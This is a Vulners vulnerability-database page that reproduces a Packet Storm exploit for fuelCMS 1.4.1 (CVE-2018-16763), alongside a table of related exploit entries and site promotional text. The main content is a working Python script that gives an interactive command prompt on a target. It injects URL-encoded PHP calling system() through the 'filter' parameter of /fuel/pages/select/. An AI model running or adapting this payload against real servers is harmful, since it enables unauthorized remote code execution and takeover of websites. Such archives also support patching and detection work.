Vulners
Lucene search
fuelCMS 1.4.1 Remote Code Execution
๐๏ธย 19 Jul 2019ย 00:00:00Reported byย 0xd0ff9Typeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 455ย Views
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | fuelCMS 1.4.1 - Remote Code Execution Exploit | 20 Jul 201900:00 | โ | zdt |
| Fuel CMS 1.4.1 - Remote Code Execution Exploit (3) | 3 Nov 202100:00 | โ | zdt |
 | Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 31 May 202215:31 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 3 Nov 202104:38 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 9 Apr 202622:37 | โ | githubexploit |
 | CVE-2018-16763 | 9 Sep 201800:00 | โ | attackerkb |
 | CVE-2018-16763 | 13 Jul 202213:02 | โ | circl |
 | FUEL CMS Remote Code Execution (CVE-2018-16763) | 31 May 202000:00 | โ | checkpoint_advisories |
10
`# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
import requests
import urllib
url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]
`
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jul 2019 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.9391